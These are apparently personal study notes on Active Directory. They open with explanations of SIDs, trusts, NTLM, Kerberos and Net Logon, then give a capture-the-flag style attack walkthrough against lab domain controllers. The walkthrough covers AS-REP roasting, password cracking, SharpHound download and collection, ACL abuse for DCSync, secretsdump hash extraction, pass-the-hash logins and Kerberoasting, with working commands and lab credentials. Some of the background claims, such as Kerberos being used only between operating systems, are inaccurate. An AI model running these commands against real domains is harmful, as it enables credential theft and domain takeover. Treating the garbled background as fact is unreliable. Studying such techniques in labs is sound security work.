Active Directory

SID: Security Identifier. Every security principal in AD gets assigned a SID. A security principal is a user or object that is set up to have security/permissions assigned to it for resource use. RID: Relative ID, This is the last bit that identifies the particular User or Group account.

• Indicates it is a SID string. The version of the SID structure. Windows NT and later starts with 1. Identifier Authority. 5 = NT Authority. Domain identifier. RID. Identifies the particular account or group.

Rids below 1000 are reserved/special accounts Important RIDs: 500(Administrator account), 512(Domain Admins group) Forests: Are clusters of domains that use “Trusts” between them. So one security principal in domain A can request and access information from domain B. Which in a corporate environment there is a legitimate need for this. There can also be multi-forest setups that have trusts between them. NTLM (Msv1_0.dll): Dependent on Net Logon service. Does client authentication and authorization. NTLM utilizes Trusts and is used when Kerberos is not available. Kerberos (Kerberos.dll): Connects the KDC(key distro center) and Active Directory for Ticket Granting Services TGS. This is used only for cross operating system permission interactions like between windows and linux. Net Logon (Netlogon.dll): This is the AD auth secure channel protocol. This is utilized when, trusts are being set up or managed, during authentication, DC locator, • Trust setup and management – Net Logon helps maintain trust passwords, gathers trust information and verifies trusts by interacting with the LSA process and the TDO. For Forest trusts, the trust information includes the Forest Trust Information (FTInfo) record, which includes the set of namespaces that a trusted forest claims to manage, annotated with a field that indicates whether each claim is actually trusted by the trusting forest. • Authentication – Supplies user credentials over a secured channel to a domain controller and returns the domain SIDs and user rights for the user • Domain controller location – Helps with finding or locating domain controllers in a domain or across domains • Pass-through validation – Credentials of users in other domains are processed by Net Logon. When a trusting domain needs to verify the identity of a user, it passes the user’s credentials through Net Logon to the trusted domain for verification • Privilege Attribute Certificate (PAC) verification – When a server using the Kerberos protocol for authentication needs to verify the PAC in a service ticket, it sends the PAC across the secure channel to its domain controller for verification. LSA (Lsasrv.dll): Local security authority that maintains local security policies and works in both the kernel mode and user mode for validating user access to objects. TDO (Trusted Domain Object): This is the container that is created for every trust that is established. The trust object will contain different information depending if its for a forest trust or a domain trust. The more of these set up the slower the access will be. New DCs will limit this at 2400 trusts. The trust link can also not be longer than 10 trusts to get to the object. - 1way vs 2way, trusts can be bi directional or single direction relationships where for a 1way only A can request information from B but not the other way. All forests are 2way but domains can have either. - Transitive vs Non-transitive, a non transitive trust is an explicate trust between domains that cannot be inherited. - pickup:

Look into

- AD hacking assistance PS scripts: - PentestWS for notes - Responder - NTLMrelayx vs SMBrelay - MITM6 - ldapdomaindump - aclpwn.py

Attacks:

-----Foothold----- Method 1: (rpc: user grab -> GetNPUser.py: grab preauth hash -> john: crack -> evil-winrm: login) - Get user name (rpc null auth, enumdomusers) - Harvest non-preauth AS_REP responses #python GetNPUsers.py -no-pass -k -dc-ip <ip> <domain/user> #python GetNPUsers.py -no-pass -k -dc-ip 10.10.10.10 htb.local/svc-alfresco //will return a hash if it worked - Save the hash to a file, hash.hash - cracking (with john) #john -w:/usr/share/wordlists/rockyou.txt hash.hash - Next use Evil-winrm to logging with creds we have #evil-winrm -i 10.10.10.10 -u svc-alfresco -p s3rvice Method2: (Already obtained a user:pass some method like nfs,smb,etc -> query for AD user info -) #GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs //enter password on request - Next use Evil-winrm to loging with creds we have #evil-winrm -i 10.10.10.10 -u svc_tgs -p somepass -----Privesc----- Method 1: (Sharphound collection on victem -> We see exchange and go for exchange vulns -> DCSync -> secretdump: request all hashes -> evil-winrm: login with admin hash) - Install and start bloodhoud(seperate video) - Move Sharephound.ps1 to the victem. Host it with HTTP then use the below ps cmd to copy it. PS> iwr http://10.10.14.15/SharpHound.ps1 -outf .\Sharphound.ps1 - Then run the AD collection script PS> Invoke-Bloodhound -CollectionMethod All -LDAPPort 389 -LDAPUser svc-alfresco -LDAPPass s3rvice - we should now see that we have a bloodhound.zip file. We need to send that back to the kali box and drag and drop it into bloodhound GUI. - After the files have been processed open Queries->Find shortest path to DAs - Then after we click the domain admin pop up we have this graphic: - We then decided to abuse DCscync when we see exchange is setup. First we add ourselves as a user. #aclpwn --domain htb.local -d htb.local -du neo4j -dp mypass -f svc-alfresco -u svc-alfresco -p s3rvice -s 10.10.10.10 If it worked we should see: Then we run secretdump to get the admin hash #secretdump.py htb.local/svc-alfresco:s3rvice@10.10.10.10 And login: #evil-winrm -i 10.10.10.10 -u Administrator -H <hash> Method2: On htb Active when we use bloodhound drop down queries we see that the admin user is kerberoastable: Which returns an infographic showing us its roastable So we run: #GetUserSPNs.py -request -dc-ip 10.10.10.10 active.htb/scv_tgs //then enter password and we should get the hash //once we crack the password we can try to psexec.py to the box to get system.